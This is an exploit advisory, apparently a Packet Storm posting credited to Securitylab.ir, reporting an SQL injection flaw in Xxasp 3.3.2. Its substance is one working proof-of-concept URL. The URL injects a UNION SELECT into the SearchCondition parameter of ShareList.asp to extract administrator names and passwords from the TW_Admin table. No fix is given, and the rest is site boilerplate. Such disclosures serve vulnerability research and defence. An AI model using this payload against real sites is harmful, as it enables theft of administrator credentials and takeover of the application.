Xxasp version 3.3.2 suffers from a remote SQL injection vulnerability.
e662fa8a9bd882e292ea848aad37f9c0########################## Securitylab.ir ########################
# Application Info:
# Name: Xxasp
# Version: 3.3.2
#################################################################
# Discoverd By: Secu_lab_ir@yahoo.com
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
#===========================================================
# http://site.com/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1
#===========================================================
#################################################################
# Security Research Team
###################################################################
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!